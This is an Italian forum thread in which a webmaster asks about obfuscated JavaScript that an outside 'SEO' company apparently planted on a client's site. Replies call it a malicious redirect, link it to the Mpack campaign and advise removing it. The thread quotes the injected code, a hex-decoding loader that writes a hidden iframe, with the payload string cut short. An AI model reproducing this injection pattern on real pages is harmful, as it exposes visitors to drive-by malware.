Salve a tutti
Ho un problema al quale, ammetto la mia ignoranza, non sto trovando risposta.

Vi spiego brevemente.
Un cliente al quale ho creato un sito Internet, si è rivolto ad un'altra ditta per farselo "ottimizzare" in modo, secondo loro, da stare nelle prime due pagine di tutti i motori di ricerca. :eek:
E vabbé...

Il fatto è, ke andando ad analizzare la pagina ottimizzata, c'è una serie di linee script come queste:

<script>function v4690d3acc352c(v4690d3acc87d5){ var v4690d3accd159=16;
return(parseInt(v4690d3acc87d5,v4690d3accd159));}function
v4690d3acd6d90(v4690d3acdbe12){ var v4690d3acea625=2; var
v4690d3ace0a42='';for(v4690d3ace5820=0;
v4690d3ace5820<v4690d3acdbe12.length;
v4690d3ace5820+=v4690d3acea625)
{4690d3ace0a42+=(String.fromCharCode(v4690d3acc352c(v4690d3acdbe12.substr(v4690d3ace5820, v4690d3acea625))));}return v4690d3ace0a42;} document.write(v4690d3acd6d90('3C696672616D65206E616D653D2737646263... '));
</script>

Con questi script, accedendo al sito, il firewall mi avvisa di un sito spia.
Rimuovendole torna tutto normale.
Poi non so se è una coincidenza, ma alcuni utenti hanno lamentato avvisi da parte di antivirus.

Mi sapete dire ke roba è?
Grazie.

sembra essere crittato...

la modifica che avrebbero dovuto consigliare e quindi consegnare in mano al proprietario avrebbe riguardato solo i meta tag.
le ditte serie non operano direttamente sul sito ma consegnano la documentazione riguardante l'ottimizzazione al richiedente che poi l'attuerà se deciderà di applicarla.

non capisco quindi perchè è stata applicato quello script senza che sappiate che impatti abbia!!

vi ricordo che il responsabile di un sito è il propietario e in secondo luogo chi è stato eletto webmaster, non di cero quella ditta ;)


Cancella quello script dal sorgente della pagina e chiedete spiegazioni visto che avete sborsato soldini (inutilmente mi verrebbe da aggiungere)..
Io l'unico servizio di keyposition l'ho acquistato da aruba (mio host) per una cifra ridiucola e ha funzionato alla grande :)

In effetti si è rivelato uno script maligno con redirect su siti esteri.
Il problema è ke la ditta ke ha operato le modifike per l'ottimizzazione pare fosse estranea. Il fatto è ke la ditta ha effettuato le modifice direttamente sul sito perkè il proprietario l'ha fatto senza dirmelo dandogli le password! :O

Comunque, some sia successo non lo so, forse qualcuno si è fatto rubare la password.
Mah...

Comunque il codice, nel dubbio, l'avevo tolto subito.

roba da matti [cit.]:D

meno male che la ditta estranea doveva "solo" ottimizare le key ...:asd:

bello script :rotfl:

Questo scherzetto è costato?

Ciao

In effetti si è rivelato uno script maligno con redirect su siti esteri.
Il problema è ke la ditta ke ha operato le modifike per l'ottimizzazione pare fosse estranea. Il fatto è ke la ditta ha effettuato le modifice direttamente sul sito perkè il proprietario l'ha fatto senza dirmelo dandogli le password! :O

Comunque, some sia successo non lo so, forse qualcuno si è fatto rubare la password.
Mah...

Comunque il codice, nel dubbio, l'avevo tolto subito.

Siete sicuramente stati sotto attacco... qualche tempo fa' (non molto tempo fa') aruba e hostingsolution sono state prese d'assedio per un attacco a larga scala tramite mpack..

in aggiunta l'italia è sotto attenzione per infezioni simili a quella che hai riportato:
http://maipiugromozon.blogspot.com/2007/07/dalla-russia-con-amore-analisi-di-un.html

ti consiglio di contattare "mausap" inquanto sta seguendo da vicino queste attività ;)
per comodità inserisco il link ad una discussione appena aperta:
http://www.hwupgrade.it/forum/showthread.php?t=1522107


ps: mai dare le password a terzi!!! prendi a calci il proprietario dopo averlo fatto sentire un bebè, non farà più danni :asd: